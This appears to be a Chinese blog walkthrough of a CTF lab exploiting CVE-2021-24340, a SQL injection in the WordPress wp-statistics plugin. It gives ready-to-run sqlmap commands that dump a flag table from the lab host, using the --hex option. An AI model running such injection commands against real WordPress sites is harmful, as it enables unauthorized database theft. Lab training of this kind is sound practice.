春秋云境CVE-2021-24340(sqlmap)保姆级教学

最新推荐文章于 2026-06-20 11:52:18 发布
原创 最新推荐文章于 2026-06-20 11:52:18 发布 · 198 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#CVE-2021-24340 #春秋云境 #系统安全 #网络安全 #安全威胁分析
#web安全 #sql

1.阅读靶场介绍

这里我们可以得到的有用信息就是

WordPress VeronaLabs wp-statistics插件

版本是13.0.8

路径是wps_pages_page功能

方式是SQL注入漏洞

2.启动靶场

这里博主提供三种信息收集的方式

第一是直接输入靶场编号(百度,csdn,都可以找找看)

第二是ai输入介绍语句或者是靶场编号找对应的poc

第三是直接github找参考(也是可以从编号和介绍着手找对应的提示)

首先这个靶场是ai和github的结合,完成攻克的

接下里各位博主可以参考一下小弟的拙见

各位博主们可以直接按照我的方式去跑sqlmap

这里博主首先执行的是这个语句

sqlmap.py -u "https://eci-2zee5ezg9pcl17t4y0l3.cloudeci1.ichunqiu.com:80/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --batch -D ctf --dump

结果是

我们能成功跑出来时间盲注的方法

接下来

我们可以跑这个语句

sqlmap.py -u "https://eci-2zee5ezg9pcl17t4y0l3.cloudeci1.ichunqiu.com:80/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --batch -D ctf -T flag --dump

这里博主省略了爆库和爆表的过程直接就是--dump输出ctf这个库flag这个表的结果

但是结果并不尽人意

这里好像是通过某种方式进行加密了

我们接下来跑这个语句

sqlmap.py -u "https://eci-2zee5ezg9pcl17t4y0l3.cloudeci1.ichunqiu.com:80/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --batch -D ctf -T flag --dump --hex

这里博主简单说一下就是变成十六进制然后看看能不能还原flag的操作

结果是

到此,我们又攻克一个靶场了

期待博主攻克什么靶场的话,欢迎留言

期待你的点赞,感谢你们宝贵的时间

Chockmans
关注
规范选型:新型电力系统安全体系选型与实战参考
m0_63828240的博客
06-18 178
新型电力系统的持续发展,对安全体系提出了持续升的要求。科学的选型是安全建设的第一步,坚守四大硬性红线、规避典型误区、践行体系化思路,才能搭建起稳定、实战、合规的安全底座。未来,伴随监管政策与网络威胁持续变化,电力安全选型标准也会不断迭代。行业各方应依托权威指南与实战经验,坚持系统治理理念,共同守护国家关键基础设施安全运行。
【人工智能专题】AI系统安全红线:用STRIDE + OWASP LLM Top 10对你的大模型应用做一次完整威胁建模
weixin_42260382的博客
06-18 296
本文介绍了AI系统安全威胁建模的核心框架和方法,重点分析了STRIDE与OWASP LLM Top 10在AI应用安全中的应用。文章指出AI系统与传统Web应用的不同安全挑战,包括无边界自然语言输入、语义攻击难以防御、推理能力被武器化等。通过对比传统与AI威胁建模的差异,提出以STRIDE为主框架结合OWASP LLM Top 10的完整建模体系。最后详细解析了OWASP LLM Top 10 2025版威胁清单,并通过数据流图展示了AI系统的信任边界划分,为AI应用安全提供了系统性方法论。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
热门推荐
weixin_59086772的博客
10-18 1万+
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
汽车安全威胁分析与风险评估技术及缓解方法
NewCarRen的博客
01-14 700
本研究认为,熟练的黑客有可能通过互联网和车对万物(Car2X)服务发起大规模远程攻击,而此类攻击对安全的破坏是最大的担忧。本研究还指出,一些恶意行为(如破坏刹车、车轮或其他关键组件)可能会危及驾驶员的车辆安全,导致致命后果。传统的针对安全技术的网络攻击要求攻击者在对安全关键系统发起远程攻击之前,至少需要物理接触车辆一次,但多项攻击事件表明,物理接触已非必要条件。最后,本研究总结了汽车领域威胁与风险评估方法的详细分析
SASE:重新定义企业网络安全边界的 “网安一体化“ 方案
2501_94646815的博客
06-15 235
计算、远程办公和数字化转型全面普及的今天,企业的网络边界正在逐渐消失。员工不再只在办公室工作,数据不再只存储在本地数据中心,应用也不再只部署在企业内网。这种深刻的变革让传统的 "围墙式" 网络安全架构彻底失效,而 SASE(安全访问服务边缘)作为一种全新的原生架构理念,正在成为企业网络安全的 "新标准"。SASE 全称 Secure Access Service Edge,即安全访问服务边缘,由 Gartner 在 2019 年首次提出。它不是某一款单一的产品,而是一种将网络连接与安全防护深度融合。
2026年全球网络安全指南:法律与实践、趋势与发展合集
网络研究观
06-15 575
该指南提供有关网络安全法律法规的最新信息,包括关键基础设施、金融行业运营韧性、网络韧性和信息通信技术认证等方面的内容。此外,该指南还探讨了网络安全与数据保护法的交叉领域,以及人工智能和医疗保健监管的最新发展。
2026年6月第4周网络安全形势周报
最新发布
Bruce_xiaowei的博客
06-20 349
本周全球网络安全态势呈"AI资产定向收割 + 关基漏洞集中曝光 + 国内执法高压震慑AI资产成为新攻击靶标:诺和诺德遭FulcrumSec定向勒索,1.3TB数据(含"蜻蜓"AI模型全栈权重、临床数据)失窃,2500万美元赎金遭拒,标志AI研发资产首次成为制药行业的核心攻击目标。KEV目录新增2个高危在野利用漏洞。
网络安全体系设计
jcgu的专栏
06-14 260
本人曾参与市政务综合办公平台的设计、开发与运维管理工作,该平台面向全市各机关单位,整合公文流转、人事档案管理、财务审批、通知公告、在线协同办公等核心业务,是政务日常运转的核心信息化载体。平台采用分层架构,前端为 Web 门户与移动端 APP,后端基于微服务架构搭建,服务节点跨多个机房部署,各单位通过政务内网、专用 VPN 网络接入系统,日均处理公文、档案、财务单据等数万条敏感数据,用户覆盖数百个机关单位、上千名工作人员。在项目中,我担任系统架构师。
Web安全二阶段综合测试:知识点速查与实战技巧
weixin_50769372的博客
06-16 357
本文为Web安全学习二阶段综合测试指南,涵盖五大核心漏洞模块:1. 文件上传漏洞:服务器未严格校验文件类型/内容,防御需签名验证、随机重命名、白名单限制;2. 弱口令漏洞:简单密码易被破解,应强制密码复杂度并禁用默认密码;3. XSS漏洞:分反射型、存储型、DOM型,需输入过滤与输出编码;4. XXE漏洞:XML解析器允许恶意外部实体,应禁用外部实体解析;5. 综合漏洞:包括SQL注入、CSRF等攻击手法。提供实操解题思路(如爆破登录、越权攻击)和DOM型XSS五种绕过方式,最终培养学员信息收集、漏洞挖掘、
瑞士网络安全法律与实践
网络研究观
06-17 213
瑞士是一个由26个联邦州(州)和一个联邦政府组成的联邦制国家。这导致了瑞士法律体系的层化,以及有时分散的官方网络安全策略。瑞士的网络安全与数据保护领域密切相关。网络安全通常被视为数据安全的衍生领域,甚至是其同义词。顾名思义,数据安全旨在保障数据处理和存储活动的安全性和弹性。
美国网络安全趋势与发展
网络研究观
06-15 316
对于希望构建具有弹性的系统并以现实和优先的方式应对或最大限度减少这些攻击影响的公司而言,了解这些相互关联的趋势和发展、它们的普遍性和它们的潜在影响至关重要。
墨西哥网络安全法律与实践
网络研究观
06-17 352
墨西哥没有专门的网络安全法,但多项法律条文间接地规范着这一领域,涉及多个监管机构。例如,有关于银行业、个人数据保护、犯罪行为和电信的法规。这些法律通过提供机构和企业必须遵守的框架来保护数字资产和个人信息,从而塑造了网络安全格局。
深度拆解网络安全“闭环”之王——APPDRR模型
聚焦网络信息安全,拆解网信原理与技术
06-15 541
面对日益复杂的网络威胁,传统PDR/PPDR模型已显不足,APPDRR模型正成为头部企业的安全新标准。该模型包含六大动态闭环环节:评估(持续风险识别)、预防(提高攻击成本)、防护(纵深技术防御)、检测(快速威胁发现)、响应(紧急事件处置)和恢复(业务韧性重建)。其核心创新在于将安全从静态防护转为动态生存能力体系,强调攻击前中后的全过程管理,通过持续循环改进构建企业安全韧性。模型特别突出风险评估的精准性和恢复能力的关键价值,推动安全思维从"绝对防御"向"快速复原"转变。
澳大利亚网络安全法律与实践
网络研究观
06-15 323
政府的愿景基于六重“盾牌”或“防御层”,包括企业和公民、安全技术、世界一流的威胁共享和拦截、受保护的关键基础设施、主权能力以及具有韧性的区域和全球领导力。政府在其行动计划中针对每一层“盾牌”制定了不同的行动和目标。
在全球化扩展的同时,OFTP2持续筑牢网络安全防线
Sinowintop的博客
06-15 288
作为全球汽车等核心产业主流的点对点数据传输协议,OFTP2在持续拓展全球应用版图的同时,持续迭代安全体系、优化互通能力,以全方位升应对日益复杂的网络安全挑战,为企业核心业务数据交换筑牢安全基石。为适配当下严苛的网络安全防护需求,OFTP2完成了规范体系的重要升,通过增设强制性加密套件、提升整体加密算法标准,全方位强化协议通信的安全防护能力,有效规避数据传输过程中的泄露、篡改、窃取等风险。从安全规范迭代、加密标准升,到全球生态持续扩容,OFTP2始终以“安全为本、适配全局、长远布局”为核心发展理念。
aklang(YAK)网络安全领域编程语言
aovenus的专栏-测试新时代(微信公众号:测试新时代)
06-15 314
Yaklang 是中国首款开源网络安全领域编程语言,用一门语言覆盖渗透测试、漏洞研究、代码审计、企业安全建设等全场景,目标是将安全能力标准化、融合化、自动化,让安全从业者从"拼装各种异构工具"中解放出来,专注于真正的高价值安全工作。
比利时网络安全趋势与发展
网络研究观
06-20 170
近年来,网络犯罪显著增加,勒索软件攻击数量不断增长,网络钓鱼活动日益复杂,重大数据泄露事件频发,私营企业和公共机构均深受其害。因此,网络安全已成为比利时公共和私营部门的一项关键战略考量。该领域的监管环仍在建设中,某些法律法规已经生效,其他要求将在未来几年内实施,具体如下。
网络安全与渗透测试实用工具大全
知识改变命运,技术就是要分享,有问题随时联系,免费答疑,欢迎联系!
06-16 301
经典可引导式Linux安全系统,无需安装即可通过U盘、DVD、虚拟机运行。内置全套最新安全工具,可一键搭建原生渗透测试环,是早期网安人员开展测试的核心系统,现已迭代为Kali Linux。
CDSL-YAK 网络安全领域编程语言 完整介绍
aovenus的专栏-测试新时代(微信公众号:测试新时代)
06-15 226
Yaklang.io 团队 构建的中国首款网络安全领域编程语言。
【架构实战】安全架构设计:让攻击者无从下手
分享技术应用、实践场景等,评论区开放技术难题讨论,共同成长进步。
06-18 258
安全架构的关键要点:纵深防御:不要依赖单一安全措施,多层防护默认安全安全应该是默认配置,不是可选功能最小权限:只授予必要的权限,不过度授权日志审计:所有操作都要有日志,方便溯源定期渗透测试:请专业团队定期做渗透测试安全培训:提高全员安全意识不要觉得"这只是内部接口"就不做安全。攻击者永远比你想象的更执着。你们系统有哪些接口可能存在安全漏洞?如果发现系统在遭受攻击,你能在几分钟内止血?个人观点,仅供参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值